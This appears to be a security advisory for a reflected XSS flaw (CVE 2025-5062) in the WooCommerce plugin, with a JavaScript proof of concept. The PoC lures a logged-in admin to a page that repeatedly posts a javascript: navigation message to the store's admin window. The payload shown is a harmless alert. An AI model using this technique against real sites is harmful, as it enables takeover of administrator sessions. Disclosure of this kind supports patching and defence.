WooCommerce < 9.4.3 – Reflected XSS | CVE 2025-5062

Description

The plugin does not validate and sanitize the event origin and data in its attachParentListeners function, leading to a Reflected XSS issue

Proof of Concept

Make a logged in admin open a page with the code below

<html>
<head>
<script>

function sleep(ms) {
    return new Promise(resolve => setTimeout(resolve, ms));
}

async function startPoc() {
   let w = window.open("https://example.com/wp-admin/admin.php?page=wc-admin&path=%2Fcustomize-store");
   while(true) {
      w.postMessage({"type": "navigate", "url": "javascript:alert(1)"}, "*");
      await sleep(1000);
   }
}
</script>
</head>
<body onclick="startPoc()">
Click anywhere on this website.
</body>
</html>